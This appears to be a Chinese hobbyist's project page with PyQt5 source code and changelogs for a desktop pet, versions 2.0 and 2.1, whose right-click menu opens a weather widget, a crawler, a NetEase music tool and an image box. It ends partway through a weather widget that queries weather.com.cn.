32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
import os
import sys
import random
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import time

from Attached.CallWeatherWin import Mainweather
from Attached.crawler import Crawler
from Attached.Blankbox import MainBOX

'''配置信息'''
class Config():
ROOT_DIR = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'resources')
print(ROOT_DIR)
ACTION_DISTRIBUTION = [
['X','X','X','X','5','19','4','18','4','19','4','18','4','19','X','X','X','X','5','6','7','8','9','10'], # 吃撇_0
['1','1a','1b','1c','1d','1','1a','1b','1c','1d'], # 眨眼_1
['1','2','3','2','3','2','3','2','3','2','3','2','3','2','3','2','3''2','3','2','3''2','3','2','3','1','1a','1b'], # 行走_2
['6','6','7','7','8','8','5','5','9','9','10','10','7','7','6','6'], # 拖动_3
['11','11a','11b','11c','11d','11e','11f','11g','11f','11g','11f','11g','11f','11g','11f','11g','11e','11d','11c','11b','11a','11'], # 打哈切_4
['12', '13', '14'], # 爬_5
['19','5','19','4','18','4','19','4','18','4','19','4','18','4','19','4','18','4','5','1','X','X','X','1','1a','1b','1c'], # 触地_6
['20', '21'], # 睡觉_7
['22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a'], # 跳跃_8
['23','23a','23','23a','23b','24','25','26','27','28','29','34','35','36','37','34','35','36','37'], # 举手_9
['15','16','17','26','27','28','29','15','34','17','26','27','28','1','1a','1b'], # 攻击_10
['30','30','30','30','30','30a','30b','30b','30b','30c','30c','30a','30b','30b','30b','30c','30c','31','32','33'], # 打喷嚏_11
['9','19','4','18','x','1b','1c','1d'], # 撞墙_12
]
PET_ACTIONS_MAP = {'pet_1': ACTION_DISTRIBUTION}
for i in range(0): PET_ACTIONS_MAP.update({'pet_%s' % i+1: ACTION_DISTRIBUTION})

'''桌面宠物'''
class DesktopPet(QWidget):
tool_name = '桌面宠物'
stat = [1,2,4,8,9,10,11]
def __init__(self, parent=None, **kwargs):
super(DesktopPet, self).__init__(parent)
self.cfg = Config()
for key, value in kwargs.items():
if hasattr(self.cfg, key): setattr(self.cfg, key, value)
self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)
self.setAutoFillBackground(False)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.repaint()
self.pet_images, iconpath = self.randomLoadPetImages()
quit_action = QAction('退出', self, triggered=self.quitPet)
quit_action.setIcon(QIcon(iconpath))
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setIcon(QIcon(iconpath))
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.show()
self.image = QLabel(self)
self.setImage(self.pet_images[0][0])
self.is_follow_mouse = False
self.mouse_drag_pos = self.pos()
self.resize(236, 260)
self.randomPosition()
self.is_running_action = False
self.action_images = []
self.action_pointer = 0
self.action_max_len = 0
self.x = self.pos().x()
self.y = self.pos().y()
self.heading = 0
self.touchdown_key = 0
self.jumpping_key = 0
self.fallingBody()

'''初始化计时器'''
def InitTimer(self,Act,start) -> None:
self.timer = QTimer()
self.timer.timeout.connect(Act)
self.timer.start(start)

'''随机做一个动作'''
def randomAct(self):
if not self.is_running_action:
self.is_running_action = True
self.key = random.randint(0,len(DesktopPet.stat)-1)
self.action = DesktopPet.stat[self.key]
print("action is:"+str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
if self.action == 2:
if self.heading == 0:
print("now is Right")
elif self.heading == 1:
print("now is Left")
elif self.action == 8:
self.jumpping_key = 1
self.InitTimer(self.randomAct,40)

if self.touchdown_key == 1:
self.action_images = self.pet_images[6]
self.action_max_len = len(self.action_images)
self.touchdown()
elif self.jumpping_key == 1:
self.action_images = self.pet_images[8]
self.action_max_len = len(self.action_images)
self.jumpping()
else:
if self.action == 2:
self.moving()
else:
self.runFrame()

'''完成动作的每一帧'''
def runFrame(self):
if self.action_pointer == self.action_max_len:
if self.action != 3:
time.sleep(0.5)
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-移动'''
def moving(self):
if self.action_pointer == self.action_max_len:
time.sleep(0.8)
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
else:
screenRect = QApplication.desktop().screenGeometry()
self.x = self.pos().x()
self.x += int(32 * (0.5 - self.heading))
if (self.heading == 1):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.heading = 0
else:
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1
elif (self.heading == 0):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.heading = 1
else:
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(1, False))
self.action_pointer += 1

'''动作-撞墙'''
def hitwall(self):
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-坠落'''
def fall(self):
y = self.pos().y()
x = self.pos().x()
y += int(16)
screenRect = QApplication.desktop().screenGeometry()
if (y >= screenRect.height() - self.size().height()):
print('now is kiss the ground')
self.action_pointer = 0
self.touchdown_key = 1
self.InitTimer(self.randomAct,80)
else:
self.move(x,y)
self.setImage(self.pet_images[6][0].mirrored(self.heading, False))

'''动作-触地'''
def touchdown(self):
self.x = self.pos().x()
self.y = self.pos().y()
self.x -= 2
self.y -= 2
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.touchdown_key = 0
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-吃瘪'''
def uncomfortable(self):
if not self.is_running_action:
self.is_running_action = True
self.action = 0
print("action is:" + str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
else:
self.runFrame()

'''动作-拖动'''
def dragging(self):
if not self.is_running_action:
self.is_running_action = True
self.action = 3
print("action is:" + str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
else:
self.runFrame()

'''动作-跳跃'''
def jumpping(self):
if self.action_pointer == 0:
self.z = 80
if self.action_pointer == self.action_max_len:
self.fallingBody()
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.jumpping_key = 0
self.z = 80
else:
screenRect = QApplication.desktop().screenGeometry()
self.x = self.pos().x()
self.y = self.pos().y()
self.x += int(48 * (0.5 - self.heading))
self.y -= self.z
self.z -= 5
if (self.heading == 1):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.fallingBody()
self.heading = 0
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1
elif (self.heading == 0):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
x = self.pos().x()
x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.fallingBody()
self.heading = 1
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1

'''设置当前显示的图片'''
def setImage(self, image):
self.image.setPixmap(QPixmap.fromImage(image))

'''随机导入一个桌面宠物的所有图片'''
def randomLoadPetImages(self):
cfg = self.cfg
pet_name = random.choice(list(cfg.PET_ACTIONS_MAP.keys()))
actions = cfg.PET_ACTIONS_MAP[pet_name]
pet_images = []
self.flag = 0
for action in actions:
patch = [self.loadImage(os.path.join(cfg.ROOT_DIR, pet_name, 'shime'+item+'.png')) for item in action]
pet_images.append(patch)
iconpath = os.path.join(cfg.ROOT_DIR, pet_name, 'shimeX.png')
return pet_images, iconpath

'''鼠标左右键功能'''
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.InitTimer(self.dragging,80)
self.is_follow_mouse = True
self.mouse_drag_pos = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
elif event.button() == Qt.RightButton:
self.InitTimer(self.uncomfortable,80)
self.menu = QMenu(self)
self.weather = self.menu.addAction("天气预报")
self.crawler = self.menu.addAction("启动爬虫")
self.imagebox = self.menu.addAction("图片盒子")
self.quitA = self.menu.addAction("退出附属程序")
self.quit = self.menu.addAction("退出桌宠")
self.choice = self.menu.exec_(self.mapToGlobal(event.pos()))

if (self.choice == self.weather):
print("weather")
self.weatherGet()
if (self.choice == self.crawler):
print("crawler")
self.crawlerStart()
if (self.choice == self.imagebox):
print("imagebox")
self.imageBox()
if (self.choice == self.quitA):
print("quitA")
self.quitAttached()
if (self.choice == self.quit):
print("quit")
self.quitPet()

self.randomAct()

'''鼠标移动, 则宠物也移动'''
def mouseMoveEvent(self, event):
if Qt.LeftButton and self.is_follow_mouse:
self.move(event.globalPos() - self.mouse_drag_pos)
event.accept()

'''鼠标释放时, 取消绑定'''
def mouseReleaseEvent(self, event):
self.is_follow_mouse = False
self.setCursor(QCursor(Qt.ArrowCursor))
self.fallingBody()

"""宠物自由落体"""
def fallingBody(self):
x = self.pos().x()
y = self.pos().y()
print("x=%x : y=%x" %(x,y))
self.InitTimer(self.fall,25)

'''导入图像'''
def loadImage(self, imagepath):
image = QImage()
image.load(imagepath)
return image

'''随机到一个屏幕上的某个位置'''
def randomPosition(self):
screen_geo = QDesktopWidget().screenGeometry()
pet_geo = self.geometry()
width = (screen_geo.width() - pet_geo.width()) * random.random()
height = (screen_geo.height() - pet_geo.height()) * random.random()
self.move(int(width), int(height))

'''天气预报'''
def weatherGet(self):
wea.show()
self.fallingBody()

'''启动爬虫'''
def crawlerStart(self):
pets.close()
cra.Start()
pets.show()
self.fallingBody()

'''图片盒子'''
def imageBox(self):
box.show()
self.fallingBody()

'''退出附属程序'''
def quitAttached(self):
wea.close()
print("Everything is done!!!")

'''退出桌宠'''
def quitPet(self):
self.close()
sys.exit()

if __name__=="__main__":
app = QApplication(sys.argv)
pets = DesktopPet()
wea = Mainweather()
palette = QPalette()
palette.setBrush(QPalette.Background, QBrush(QPixmap("D:\PythonProject\images\YHellow.png")))
wea.setPalette(palette)
cra = Crawler()
box = MainBOX()
pets.show()
sys.exit(app.exec_())

更新日志:

  • version:v2.0
  • date:2022.5.14
  • type:
    • Features:
      • 新添右键功能:天气预报
      • 新添右键功能:爬虫
      • 新添右键功能:图片盒子
      • 新添右键功能:关闭所有附属程序
    • Changed:NULL
    • Removed:NULL
  • desc:
    • 想做的差不多都做了,下次试试连接网易云的 API

DesktopPets_v2.1

新加入“网易云API”选项,其本质是一个爬虫,可以在 UI 界面选择歌曲

PS:由于本人不会并发,所以在“网易云爬虫”爬歌的时候,桌宠和 UI 界面都会卡顿

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
import os
import sys
import random
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import requests
import time

from Attached.CallWeatherWin import Mainweather
from Attached.crawler import Crawler
from Attached.Blankbox import MainBOX
from Attached.Netease import Netease

'''配置信息'''
class Config():
ROOT_DIR = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'resources')
print(ROOT_DIR)
ACTION_DISTRIBUTION = [
['X','X','X','X','5','19','4','18','4','19','4','18','4','19','X','X','X','X','5','6','7','8','9','10'], # 吃撇_0
['1','1a','1b','1c','1d','1','1a','1b','1c','1d'], # 眨眼_1
['1','2','3','2','3','2','3','2','3','2','3','2','3','2','3','2','3''2','3','2','3''2','3','2','3','1','1a','1b'], # 行走_2
['6','6','7','7','8','8','5','5','9','9','10','10','7','7','6','6'], # 拖动_3
['11','11a','11b','11c','11d','11e','11f','11g','11f','11g','11f','11g','11f','11g','11f','11g','11e','11d','11c','11b','11a','11'], # 打哈切_4
['12', '13', '14'], # 爬_5
['19','5','19','4','18','4','19','4','18','4','19','4','18','4','19','4','18','4','5','1','X','X','X','1','1a','1b','1c'], # 触地_6
['20', '21'], # 睡觉_7
['22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a','22','22a'], # 跳跃_8
['23','23a','23','23a','23b','24','25','26','27','28','29','34','35','36','37','34','35','36','37'], # 举手_9
['15','16','17','26','27','28','29','15','34','17','26','27','28','1','1a','1b'], # 攻击_10
['30','30','30','30','30','30a','30b','30b','30b','30c','30c','30a','30b','30b','30b','30c','30c','31','32','33'], # 打喷嚏_11
['9','19','4','18','x','1b','1c','1d'], # 撞墙_12
]
PET_ACTIONS_MAP = {'pet_1': ACTION_DISTRIBUTION}
for i in range(0): PET_ACTIONS_MAP.update({'pet_%s' % i+1: ACTION_DISTRIBUTION})

'''桌面宠物'''
class DesktopPet(QWidget):
tool_name = '桌面宠物'
stat = [1,2,4,8,9,10,11]
def __init__(self, parent=None, **kwargs):
super(DesktopPet, self).__init__(parent)
self.cfg = Config()
for key, value in kwargs.items():
if hasattr(self.cfg, key): setattr(self.cfg, key, value)
self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)
self.setAutoFillBackground(False)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.repaint()
self.pet_images, iconpath = self.randomLoadPetImages()
quit_action = QAction('退出', self, triggered=self.quitPet)
quit_action.setIcon(QIcon(iconpath))
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setIcon(QIcon(iconpath))
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.show()
self.image = QLabel(self)
self.setImage(self.pet_images[0][0])
self.is_follow_mouse = False
self.mouse_drag_pos = self.pos()
self.resize(236, 260)
self.randomPosition()
self.is_running_action = False
self.action_images = []
self.action_pointer = 0
self.action_max_len = 0
self.x = self.pos().x()
self.y = self.pos().y()
self.heading = 0
self.touchdown_key = 0
self.jumpping_key = 0
self.fallingBody()

'''初始化计时器'''
def InitTimer(self,Act,start) -> None:
self.timer = QTimer()
self.timer.timeout.connect(Act)
self.timer.start(start)

'''随机做一个动作'''
def randomAct(self):
if not self.is_running_action:
self.is_running_action = True
self.key = random.randint(0,len(DesktopPet.stat)-1)
self.action = DesktopPet.stat[self.key]
print("action is:"+str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
if self.action == 2:
if self.heading == 0:
print("now is Right")
elif self.heading == 1:
print("now is Left")
elif self.action == 8:
self.jumpping_key = 1
self.InitTimer(self.randomAct,40)

if self.touchdown_key == 1:
self.action_images = self.pet_images[6]
self.action_max_len = len(self.action_images)
self.touchdown()
elif self.jumpping_key == 1:
self.action_images = self.pet_images[8]
self.action_max_len = len(self.action_images)
self.jumpping()
else:
if self.action == 2:
self.moving()
else:
self.runFrame()

'''完成动作的每一帧'''
def runFrame(self):
if self.action_pointer == self.action_max_len:
if self.action != 3:
time.sleep(0.5)
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-移动'''
def moving(self):
if self.action_pointer == self.action_max_len:
time.sleep(0.8)
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
else:
screenRect = QApplication.desktop().screenGeometry()
self.x = self.pos().x()
self.x += int(32 * (0.5 - self.heading))
if (self.heading == 1):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.heading = 0
else:
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1
elif (self.heading == 0):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.heading = 1
else:
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(1, False))
self.action_pointer += 1

'''动作-撞墙'''
def hitwall(self):
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.move(self.x, self.pos().y())
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-坠落'''
def fall(self):
y = self.pos().y()
x = self.pos().x()
y += int(16)
screenRect = QApplication.desktop().screenGeometry()
if (y >= screenRect.height() - self.size().height()):
print('now is kiss the ground')
self.action_pointer = 0
self.touchdown_key = 1
self.InitTimer(self.randomAct,80)
else:
self.move(x,y)
self.setImage(self.pet_images[6][0].mirrored(self.heading, False))

'''动作-触地'''
def touchdown(self):
self.x = self.pos().x()
self.y = self.pos().y()
self.x -= 2
self.y -= 2
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.touchdown_key = 0
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(self.heading, False))
self.action_pointer += 1

'''动作-吃瘪'''
def uncomfortable(self):
if not self.is_running_action:
self.is_running_action = True
self.action = 0
print("action is:" + str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
else:
self.runFrame()

'''动作-拖动'''
def dragging(self):
if not self.is_running_action:
self.is_running_action = True
self.action = 3
print("action is:" + str(self.action))
self.action_images = self.pet_images[self.action]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.heading = random.randint(0, 1)
else:
self.runFrame()

'''动作-跳跃'''
def jumpping(self):
if self.action_pointer == 0:
self.z = 80
if self.action_pointer == self.action_max_len:
self.fallingBody()
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.jumpping_key = 0
self.z = 80
else:
screenRect = QApplication.desktop().screenGeometry()
self.x = self.pos().x()
self.y = self.pos().y()
self.x += int(48 * (0.5 - self.heading))
self.y -= self.z
self.z -= 5
if (self.heading == 1):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
self.x = self.pos().x()
self.x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.fallingBody()
self.heading = 0
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1
elif (self.heading == 0):
if ((self.x <= 0 and self.heading == 1) or (
self.x >= screenRect.width() - self.size().width() and self.heading == 0)):
print('now is hit wall')
x = self.pos().x()
x += int(32)
self.action_images = self.pet_images[12]
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.hitwall()
self.fallingBody()
self.heading = 1
else:
self.move(self.x, self.y)
self.setImage(self.action_images[self.action_pointer].mirrored(0, False))
self.action_pointer += 1

'''设置当前显示的图片'''
def setImage(self, image):
self.image.setPixmap(QPixmap.fromImage(image))

'''随机导入一个桌面宠物的所有图片'''
def randomLoadPetImages(self):
cfg = self.cfg
pet_name = random.choice(list(cfg.PET_ACTIONS_MAP.keys()))
actions = cfg.PET_ACTIONS_MAP[pet_name]
pet_images = []
self.flag = 0
for action in actions:
patch = [self.loadImage(os.path.join(cfg.ROOT_DIR, pet_name, 'shime'+item+'.png')) for item in action]
pet_images.append(patch)
iconpath = os.path.join(cfg.ROOT_DIR, pet_name, 'shimeX.png')
return pet_images, iconpath

'''鼠标左右键功能'''
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.InitTimer(self.dragging,80)
self.is_follow_mouse = True
self.mouse_drag_pos = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
elif event.button() == Qt.RightButton:
self.InitTimer(self.uncomfortable,80)
self.menu = QMenu(self)
self.weather = self.menu.addAction("天气预报")
self.crawler = self.menu.addAction("启动爬虫")
self.music = self.menu.addAction("网易云API")
self.imagebox = self.menu.addAction("图片盒子")
self.quitA = self.menu.addAction("退出附属程序")
self.quit = self.menu.addAction("退出桌宠")
self.choice = self.menu.exec_(self.mapToGlobal(event.pos()))

if (self.choice == self.weather):
print("weather")
self.weatherGet()
if (self.choice == self.crawler):
print("crawler")
self.crawlerStart()
if (self.choice == self.music):
print("music")
self.Netease()
if (self.choice == self.imagebox):
print("imagebox")
self.imageBox()
if (self.choice == self.quitA):
print("quitA")
self.quitAttached()
if (self.choice == self.quit):
print("quit")
self.quitPet()

self.randomAct()

'''鼠标移动, 则宠物也移动'''
def mouseMoveEvent(self, event):
if Qt.LeftButton and self.is_follow_mouse:
self.move(event.globalPos() - self.mouse_drag_pos)
event.accept()

'''鼠标释放时, 取消绑定'''
def mouseReleaseEvent(self, event):
self.is_follow_mouse = False
self.setCursor(QCursor(Qt.ArrowCursor))
self.fallingBody()

"""宠物自由落体"""
def fallingBody(self):
x = self.pos().x()
y = self.pos().y()
print("x=%x : y=%x" %(x,y))
self.InitTimer(self.fall,25)

'''导入图像'''
def loadImage(self, imagepath):
image = QImage()
image.load(imagepath)
return image

'''随机到一个屏幕上的某个位置'''
def randomPosition(self):
screen_geo = QDesktopWidget().screenGeometry()
pet_geo = self.geometry()
width = (screen_geo.width() - pet_geo.width()) * random.random()
height = (screen_geo.height() - pet_geo.height()) * random.random()
self.move(int(width), int(height))

'''天气预报'''
def weatherGet(self):
wea.show()
self.fallingBody()

'''启动爬虫'''
def crawlerStart(self):
pets.close()
cra.Start()
pets.show()
self.fallingBody()

def Netease(self):
mus.show()
self.fallingBody()

'''图片盒子'''
def imageBox(self):
box.show()
self.fallingBody()

'''退出附属程序'''
def quitAttached(self):
wea.close()
box.close()
mus.close()
print("Everything is done!!!")

'''退出桌宠'''
def quitPet(self):
self.close()
sys.exit()

if __name__=="__main__":
app = QApplication(sys.argv)
pets = DesktopPet()
wea = Mainweather()
mus = Netease()
palette = QPalette()
palette.setBrush(QPalette.Background, QBrush(QPixmap("D:\PythonProject\images\YHellow.png")))
wea.setPalette(palette)
mus.setPalette(palette)
cra = Crawler()
box = MainBOX()
pets.show()
sys.exit(app.exec_())

更新日志:

  • version:v2.1
  • date:2022.5.20
  • type:
    • Features:
      • 新添右键功能:网易云API
    • Changed:NULL
    • Removed:NULL
  • desc:
    • 以我的技术,感觉已经到极限了,可能会有好长一段时间都不会更新了

天气预报

这是一个小项目,就是某本书上的一个例题

原理为:

  • requests 获取中国天气官网地址的 web API
  • 使用 Python 进行打印

样例代码为:

1
2
3
4
5
6
7
8
9
10
11
import requests

rep=requests.get('http://www.weather.com.cn/data/sk/101270101.html') # 成都,101270101

rep.encoding='utf-8'
print('返回结果: %s' % rep.json() )
print('城市: %s' %rep.json()['weatherinfo']['city'])
print('风向: %s' % rep.json()['weatherinfo']['WD'])
print('温度: %s' % rep.json()['weatherinfo']['temp']+ " 度")
print('风力: %s' % rep.json()['weatherinfo']['WS'])
print('湿度: %s' % rep.json()['weatherinfo']['SD'])

CallWeatherWin_V1.0

这个小程序是为了桌宠写的,我会把它添加到桌宠的右键菜单中

目前只添加了两个城市,如果有需要可以在网上搜索城市代码,自行添加

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import requests

class Mainweather(QWidget):
def __init__(self,parent=None,**kwargs):
super(Mainweather, self).__init__(parent)
for key, value in kwargs.items():
if hasattr(self.cfg, key): setattr(self.cfg, key, value)
self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint | Qt.SubWindow)
self.ui = UI_Form()
self.ui.setupUI(self)

def queryWeather(self):
print('* queryWeather ')
cityName = self.ui.weatherComboBox.currentText()
cityCode = self.transCityName(cityName)

rep = requests.get('http://www.weather.com.cn/data/sk/'+cityCode+'.html')
rep.encoding = 'utf-8'
print(rep.json())

msg1 = ('城市: %s' % rep.json()['weatherinfo']['city'])+'\n'
msg2 = ('风向: %s' % rep.json()['weatherinfo']['WD'])+'\n'
msg3 = ('温度: %s' % rep.json()['weatherinfo']['temp'] + " 度")+'\n'
msg4 = ('风力: %s' % rep.json()['weatherinfo']['WS'])+'\n'
msg5 = ('湿度: %s' % rep.json()['weatherinfo']['SD'])+'\n'

result = msg1+msg2+msg3+msg4+msg5
self.ui.resultText.setText(result)

def transCityName(self,cityName):
cityCode = ''
if cityName == '成都':
cityCode = '101270101'
elif cityName == '南充':
cityCode = '101270501'
return cityCode

def clearResult(self):
print('* clearResult ')
self.ui.resultText.clear()

def quitWindows(self):
print('* quitWindows ')
result = "由于本项目不完善,请右键桌宠进行关闭"
self.ui.resultText.setText(result)
self.close()

class UI_Form(object):
def setupUI(self,Form):
Form.setObjectName("Form")
Form.resize(450,350)

self.groupBox = QtWidgets.QGroupBox(Form)
self.groupBox.setGeometry(QtCore.QRect(10,10,431,251))
self.groupBox.setObjectName("groupBox")
self.weatherComboBox = QtWidgets.QComboBox(self.groupBox)
self.weatherComboBox.setGeometry(QtCore.QRect(80,30,221,21))
